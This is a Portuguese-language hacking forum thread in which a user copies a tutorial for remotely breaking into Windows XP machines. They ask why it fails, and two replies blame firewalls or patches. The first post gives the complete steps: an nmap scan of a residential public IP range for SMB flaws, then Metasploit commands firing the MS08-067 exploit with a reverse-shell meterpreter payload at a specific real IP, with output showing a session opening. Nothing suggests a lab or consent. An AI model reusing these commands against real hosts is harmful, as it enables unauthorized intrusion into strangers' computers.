Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

ERRO em Invasão Remota (backtrack)

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    ERRO em Invasão Remota (backtrack)

    Invasão Remota em Windows XP sp 2&3 - Real Live
    Abro a shell do meu backtrack e digito:

    root@bt:~# nmap -p 445 --script=smb-check-vulns 189.29.148.* --> -p pra porta especifica, a parte

    do script é pra achar vulnerabilidades no serviço "smb" o asteristico no final do ip é pra passa em toda faixa de ip.

    Aparece uma lista gigantesca de resultados de portas fechadas, não sabe avaliar, não vulneravel, possivelmente vulneravel e

    vulneraveis. Aqui a saida de um vulneravel:

    Nmap scan report for 189-29-151-59-nd.cpe.vivax.com.br (189.29.151.59)
    Host is up (0.078s latency).
    PORT STATE SERVICE
    445/tcp open microsoft-ds

    Host script results:
    | smb-check-vulns:
    | MS08-067: VULNERABLE
    | Conficker: Likely CLEAN
    | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
    | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
    | MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
    |_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

    Então abro outra shell e dou o comando "msfconsole":

    root@bt:~# msfconsole .


    ____ ____| |_ ____ ___ ____ | | ___ _| |_
    | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
    | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
    |_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
    |_|


    =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
    + -- --=[ 640 exploits - 322 auxiliary
    + -- --=[ 215 payloads - 27 encoders - 8 nops
    =[ svn r11458 updated 3 days ago (2010.12.31)

    msf > search ms08-067 --> Busca por exploit que contenha no nome "ms08-067"[*] Searching loaded modules for pattern 'ms08-067'...

    Exploits
    ========

    Name Disclosure Date Rank Description
    ---- --------------- ---- -----------
    windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption

    msf > use windows/smb/ms08_067_netapi --> Utilizar o exploit ms08-067

    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reerse_tcp - Utiliza o payload do reverse

    meterpreter
    payload => windows/meterpreter/reverse_tcp

    msf exploit(ms08_067_netapi) > set LPORT 4444 --> Ouvir na Porta 4444
    LPORT => 4444

    msf exploit(ms08_067_netapi) > set LHOST xxx.xxx.xxx.xxx --> Se conecta no no alvo (Meu Ip)
    LHOST => xxx.xxx.xxx.xxx

    msf exploit(ms08_067_netapi) > set RHOST 189.29.151.59 --> Computador Vulneravel
    RHOST => 189.29.148.57

    msf exploit(ms08_067_netapi) > set ReverseListenerBindAddress 192.168.xxx.xxx --> Endereço de rede da minha maquina atacante
    ReverseListenerBindAddress => 192.168.xxx.xxx

    msf exploit(ms08_067_netapi) > set target 0 --> Dedecção de Alvo Automatica
    target => 0

    msf exploit(ms08_067_netapi) > exploit --> Lança Exploit
    [*] Started reverse handler on 192.168.xxx.xxxx:4444[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Portuguese - Brazilian[*] Selected Target: Windows XP SP2 Portuguese - Brazilian (NX)[*] Attempting to trigger the vulnerability...[*] Sending stage (749056 bytes) to 189.29.151.59[*] Meterpreter session 1 opened (192.168.xxx.xxx:4444 -> 189.29.151.59:1747) at Mon Jan 03 17:51: 27 -0200 2011

    Achei o seguinte tutorial aqui mesmo no Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... , mais vejam o que está dando no final do "percurso"



    Alguém pode me ajudar? sabe o porque disso?
    Attached Files
    Similar Threads

  • Font Size
    #2
    Cara provavelmente não está vulneravel então...
    Ele meio que bloqueia esse reverse nessa porta, acho que é isso abraços.
    Att.



    Comment


    • Font Size
      #3
      [/i]essa exploit so funciona caso o Firewall estiver desativado e A vítima não ter baixado o patch de correção da falha. mais ai , tenho mais do q certeza q é o firewall bloquando o acesso . [/i]
      DEAD
      #RIP 2016

      Comment

      X
      Working...
      X